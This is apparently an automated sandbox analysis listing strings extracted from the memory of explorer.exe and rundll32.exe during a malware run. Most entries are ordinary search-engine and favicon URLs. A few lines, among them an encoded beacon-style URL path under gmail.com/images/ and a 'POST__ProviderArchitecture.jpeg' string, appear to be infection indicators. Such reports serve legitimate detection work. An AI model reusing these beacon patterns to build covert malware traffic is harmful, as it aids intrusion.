Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.2609457213.03470000.00000008.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000000.2603057698.01D00000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpS
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: rundll32.exe, 00000008.00000003.2600136801.02798000.00000004.00000040.sdmp	String found in binary or memory: https://POST__ProviderArchitecture.jpeg
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: https://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%2
Source: {7C1C9B23-1AA1-11EA-B7AC-B2C276BF9C88}.dat.24.dr	String found in binary or memory: https://gmail.com/images/orz7wiwBQeAbV83/2pV2HBfXVHHaZmj_2F/8ZM3Yt8hS/_2Fwmjy1xv2PVGii_2FO/n1o2O_2FF
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: https://www.mozilla.org/de/firefox/new
